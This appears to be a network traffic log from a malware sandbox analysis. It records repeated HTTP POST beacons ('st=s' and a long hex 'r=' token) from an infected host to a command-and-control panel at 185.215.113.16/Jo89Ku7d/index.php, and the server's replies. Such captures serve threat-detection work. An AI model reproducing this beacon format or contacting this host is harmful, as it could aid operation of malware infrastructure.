Jul 26, 2024 10:40:28.941173077 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:40:29.702658892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 10:36:45.779023886 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:36:46.543324947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 10:36:46.546753883 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 10:36:46.797837019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:36:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 10:40:29.816658020 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 10:40:30.591564894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 08:40:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0